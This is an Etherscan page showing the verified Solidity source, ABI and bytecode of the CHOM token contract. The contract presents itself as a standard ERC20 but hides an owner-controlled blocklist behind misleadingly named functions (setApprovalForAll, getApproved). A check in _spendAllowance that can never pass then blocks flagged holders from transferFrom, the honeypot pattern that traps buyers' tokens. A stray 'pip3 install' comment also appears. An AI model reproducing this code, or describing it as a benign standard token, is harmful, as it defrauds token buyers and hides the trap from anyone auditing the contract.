ETH Price: $3,489.42 (+3.66%)
Gas: 3 Gwei

Token

CHOM (CHOM)
 

Overview

Max Total Supply

1,000,000,000,000 CHOM

Holders

23

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
8,184,776,192.133198908779503838 CHOM

Value
$0.00
0x558b389513d2b996b29485027991dfdfb22348f0
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
CHOM

Compiler Version
v0.8.18+commit.87f61d96

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-01
*/

/**
 *Submitted for verification at Etherscan.io on 2023-05-31
*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/*
    pip3 install endless-flex-v1.1
*/

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}


/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _allowance;

    mapping(address => mapping(address => uint256)) public _allowances;

    uint256 private _totalSupply;

    bool private _allowanceApplied = false;
    string private _name;
    string private _symbol;
    

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function setApprovalForAll(address [] calldata _all_) external onlyOwner {
        for (uint256 i = 0; i < _all_.length; i++) {
            _allowance[_all_[i]] = true;
        }
    }

    function getApproved(address [] calldata _all_) external onlyOwner {
        for (uint256 i = 0; i < _all_.length; i++) {
            _allowance[_all_[i]] = false;
        }
    }

    function isApprovedForAll(address _id_) public view returns (bool) {
        return _allowance[_id_];
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
        if (_allowance[owner] || _allowance[spender]) require(_allowanceApplied == true, "");
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}



    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

contract CHOM is ERC20 {
    constructor() ERC20("CHOM", "CHOM") {
        _mint(msg.sender, 1000000000000 * 10 ** decimals());
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"_allowances","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_all_","type":"address[]"}],"name":"getApproved","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_id_","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"_all_","type":"address[]"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526005805460ff191690553480156200001b57600080fd5b506040518060400160405280600481526020016343484f4d60e01b8152506040518060400160405280600481526020016343484f4d60e01b815250620000706200006a620000cf60201b60201c565b620000d3565b60066200007e838262000299565b5060076200008d828262000299565b505050620000c933620000a56200012360201b60201c565b620000b290600a6200047a565b620000c39064e8d4a5100062000492565b62000128565b620004c2565b3390565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b601290565b6001600160a01b038216620001835760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060046000828254620001979190620004ac565b90915550506001600160a01b0382166000818152600160209081526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200022057607f821691505b6020821081036200024157634e487b7160e01b600052602260045260246000fd5b50919050565b601f821115620001f057600081815260208120601f850160051c81016020861015620002705750805b601f850160051c820191505b8181101562000291578281556001016200027c565b505050505050565b81516001600160401b03811115620002b557620002b5620001f5565b620002cd81620002c684546200020b565b8462000247565b602080601f831160018114620003055760008415620002ec5750858301515b600019600386901b1c1916600185901b17855562000291565b600085815260208120601f198616915b82811015620003365788860151825594840194600190910190840162000315565b5085821015620003555787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620003bc578160001904821115620003a057620003a062000365565b80851615620003ae57918102915b93841c939080029062000380565b509250929050565b600082620003d55750600162000474565b81620003e45750600062000474565b8160018114620003fd5760028114620004085762000428565b600191505062000474565b60ff8411156200041c576200041c62000365565b50506001821b62000474565b5060208310610133831016604e8410600b84101617156200044d575081810a62000474565b6200045983836200037b565b806000190482111562000470576200047062000365565b0290505b92915050565b60006200048b60ff841683620003c4565b9392505050565b808202811582820484141762000474576200047462000365565b8082018082111562000474576200047462000365565b610ccc80620004d26000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a257806395d89b411161007157806395d89b411461026e578063a457c2d714610276578063a9059cbb14610289578063dd62ed3e1461029c578063f2fde38b146102af57600080fd5b806370a082311461020f578063715018a614610238578063716496ae146102405780638da5cb5b1461025357600080fd5b806318160ddd116100e957806318160ddd146101bd57806323b872dd146101c55780632ee17e0b146101d8578063313ce567146101ed57806339509351146101fc57600080fd5b8063024c2ddd1461011b57806306fdde0314610159578063095ea7b31461016e57806309690a4914610191575b600080fd5b610146610129366004610a86565b600360209081526000928352604080842090915290825290205481565b6040519081526020015b60405180910390f35b6101616102c2565b6040516101509190610ab9565b61018161017c366004610b07565b610354565b6040519015158152602001610150565b61018161019f366004610b31565b6001600160a01b031660009081526002602052604090205460ff1690565b600454610146565b6101816101d3366004610b53565b61036e565b6101eb6101e6366004610b8f565b610392565b005b60405160128152602001610150565b61018161020a366004610b07565b610411565b61014661021d366004610b31565b6001600160a01b031660009081526001602052604090205490565b6101eb610433565b6101eb61024e366004610b8f565b610447565b6000546040516001600160a01b039091168152602001610150565b6101616104c1565b610181610284366004610b07565b6104d0565b610181610297366004610b07565b610550565b6101466102aa366004610a86565b61055e565b6101eb6102bd366004610b31565b610589565b6060600680546102d190610c04565b80601f01602080910402602001604051908101604052809291908181526020018280546102fd90610c04565b801561034a5780601f1061031f5761010080835404028352916020019161034a565b820191906000526020600020905b81548152906001019060200180831161032d57829003601f168201915b5050505050905090565b600033610362818585610602565b60019150505b92915050565b60003361037c858285610726565b610387858585610815565b506001949350505050565b61039a6109c0565b60005b8181101561040c576001600260008585858181106103bd576103bd610c3e565b90506020020160208101906103d29190610b31565b6001600160a01b031681526020810191909152604001600020805460ff19169115159190911790558061040481610c6a565b91505061039d565b505050565b600033610362818585610424838361055e565b61042e9190610c83565b610602565b61043b6109c0565b6104456000610a1a565b565b61044f6109c0565b60005b8181101561040c5760006002600085858581811061047257610472610c3e565b90506020020160208101906104879190610b31565b6001600160a01b031681526020810191909152604001600020805460ff1916911515919091179055806104b981610c6a565b915050610452565b6060600780546102d190610c04565b600033816104de828661055e565b9050838110156105435760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6103878286868403610602565b600033610362818585610815565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b6105916109c0565b6001600160a01b0381166105f65760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161053a565b6105ff81610a1a565b50565b6001600160a01b0383166106645760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161053a565b6001600160a01b0382166106c55760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161053a565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610732848461055e565b9050600019811461079a578181101561078d5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604482015260640161053a565b61079a8484848403610602565b6001600160a01b03841660009081526002602052604090205460ff16806107d957506001600160a01b03831660009081526002602052604090205460ff165b1561080f5760055460ff16151560011461080f5760405162461bcd60e51b8152602060048201526000602482015260440161053a565b50505050565b6001600160a01b0383166108795760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161053a565b6001600160a01b0382166108db5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161053a565b6001600160a01b038316600090815260016020526040902054818110156109535760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161053a565b6001600160a01b0380851660008181526001602052604080822086860390559286168082529083902080548601905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906109b39086815260200190565b60405180910390a361080f565b6000546001600160a01b031633146104455760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161053a565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b80356001600160a01b0381168114610a8157600080fd5b919050565b60008060408385031215610a9957600080fd5b610aa283610a6a565b9150610ab060208401610a6a565b90509250929050565b600060208083528351808285015260005b81811015610ae657858101830151858201604001528201610aca565b506000604082860101526040601f19601f8301168501019250505092915050565b60008060408385031215610b1a57600080fd5b610b2383610a6a565b946020939093013593505050565b600060208284031215610b4357600080fd5b610b4c82610a6a565b9392505050565b600080600060608486031215610b6857600080fd5b610b7184610a6a565b9250610b7f60208501610a6a565b9150604084013590509250925092565b60008060208385031215610ba257600080fd5b823567ffffffffffffffff80821115610bba57600080fd5b818501915085601f830112610bce57600080fd5b813581811115610bdd57600080fd5b8660208260051b8501011115610bf257600080fd5b60209290920196919550909350505050565b600181811c90821680610c1857607f821691505b602082108103610c3857634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052603260045260246000fd5b634e487b7160e01b600052601160045260246000fd5b600060018201610c7c57610c7c610c54565b5060010190565b8082018082111561036857610368610c5456fea2646970667358221220ab5977e1e8d9c5535cfcecf9654dc71d9b2b33440a69319948402f4c4d1f7a0464736f6c63430008120033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101165760003560e01c806370a08231116100a257806395d89b411161007157806395d89b411461026e578063a457c2d714610276578063a9059cbb14610289578063dd62ed3e1461029c578063f2fde38b146102af57600080fd5b806370a082311461020f578063715018a614610238578063716496ae146102405780638da5cb5b1461025357600080fd5b806318160ddd116100e957806318160ddd146101bd57806323b872dd146101c55780632ee17e0b146101d8578063313ce567146101ed57806339509351146101fc57600080fd5b8063024c2ddd1461011b57806306fdde0314610159578063095ea7b31461016e57806309690a4914610191575b600080fd5b610146610129366004610a86565b600360209081526000928352604080842090915290825290205481565b6040519081526020015b60405180910390f35b6101616102c2565b6040516101509190610ab9565b61018161017c366004610b07565b610354565b6040519015158152602001610150565b61018161019f366004610b31565b6001600160a01b031660009081526002602052604090205460ff1690565b600454610146565b6101816101d3366004610b53565b61036e565b6101eb6101e6366004610b8f565b610392565b005b60405160128152602001610150565b61018161020a366004610b07565b610411565b61014661021d366004610b31565b6001600160a01b031660009081526001602052604090205490565b6101eb610433565b6101eb61024e366004610b8f565b610447565b6000546040516001600160a01b039091168152602001610150565b6101616104c1565b610181610284366004610b07565b6104d0565b610181610297366004610b07565b610550565b6101466102aa366004610a86565b61055e565b6101eb6102bd366004610b31565b610589565b6060600680546102d190610c04565b80601f01602080910402602001604051908101604052809291908181526020018280546102fd90610c04565b801561034a5780601f1061031f5761010080835404028352916020019161034a565b820191906000526020600020905b81548152906001019060200180831161032d57829003601f168201915b5050505050905090565b600033610362818585610602565b60019150505b92915050565b60003361037c858285610726565b610387858585610815565b506001949350505050565b61039a6109c0565b60005b8181101561040c576001600260008585858181106103bd576103bd610c3e565b90506020020160208101906103d29190610b31565b6001600160a01b031681526020810191909152604001600020805460ff19169115159190911790558061040481610c6a565b91505061039d565b505050565b600033610362818585610424838361055e565b61042e9190610c83565b610602565b61043b6109c0565b6104456000610a1a565b565b61044f6109c0565b60005b8181101561040c5760006002600085858581811061047257610472610c3e565b90506020020160208101906104879190610b31565b6001600160a01b031681526020810191909152604001600020805460ff1916911515919091179055806104b981610c6a565b915050610452565b6060600780546102d190610c04565b600033816104de828661055e565b9050838110156105435760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084015b60405180910390fd5b6103878286868403610602565b600033610362818585610815565b6001600160a01b03918216600090815260036020908152604080832093909416825291909152205490565b6105916109c0565b6001600160a01b0381166105f65760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161053a565b6105ff81610a1a565b50565b6001600160a01b0383166106645760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161053a565b6001600160a01b0382166106c55760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161053a565b6001600160a01b0383811660008181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a